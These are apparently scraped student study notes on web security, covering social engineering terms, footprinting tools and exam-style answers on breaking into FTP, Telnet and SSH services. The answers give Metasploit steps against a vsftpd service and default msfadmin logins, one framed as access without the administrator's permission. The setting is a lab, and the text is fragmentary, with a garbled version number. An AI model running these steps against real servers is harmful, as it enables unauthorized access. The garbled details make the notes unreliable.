Professional Documents
Culture Documents
Summary Web Security
Summary Web Security
Summary Web Security
Shoulder Surfing – refers to using direct observation techniques, such as looking over
someone’s shoulder, to get information.
It is commonly used to obtain passwords, PINs, security codes and
similar data.
Tail Gating/Piggy Backing – refers to when a person tags along with another person who is
authorized to gain entry into a restricted area, or pass a certain checkpoint.
o “Tailgating” implies without a consent while “Piggybacking” usually implies
consent of the authorized person.
Dumpster Diving – is looking for treasure in someone else’s trash. (A Dumpster is a large
trash container).
[2] Hacking Process
1. Footprinting
Footprinting - refers to gathering all useful information about the target.
Tools for Footprinting:
WhoIs, Ping
NS Lookup, Tracert
IP Lookup
3. Gaining Access
Password Attacks
Social Engineering
Viruses
What is Cryptography?
Cryptography: - is the process of hiding or coding information so that only the person a
message was intended for can read it.
2. If you find that port 20/21 is open and vstpd v 3.4 is running how you will hack that
server?
Answer: port 20/21 FTP
To know service version: nmap –sV 192.168.1.1
Msfconsole
Search vsftp
Copy name (Shift + Ctrl + C)
To use: use [here] paste the name (Shift + Ctrl + V)
Show payloads
Copy the payload’s name
Set payload [here] paste the name
Show options
Set RHOST 192.168.1.1
Exploit
COMPELETED…
To check: whoami
6. If you find that port 23 is open how you will enter that server?
Answer: port 23 Telnet
telnet 192.168.1.1 COMPLETED…
login: msfadmin To check: whoami
password: msfadmin
7. If your find that port 22 is open list the steps that you will follow to use that server
without the permission of the administrator?
Answer: port 22 SSH
ssh msfadmin@192.168.1.1
password: msfadmin
COMPLETED…
To check: whoami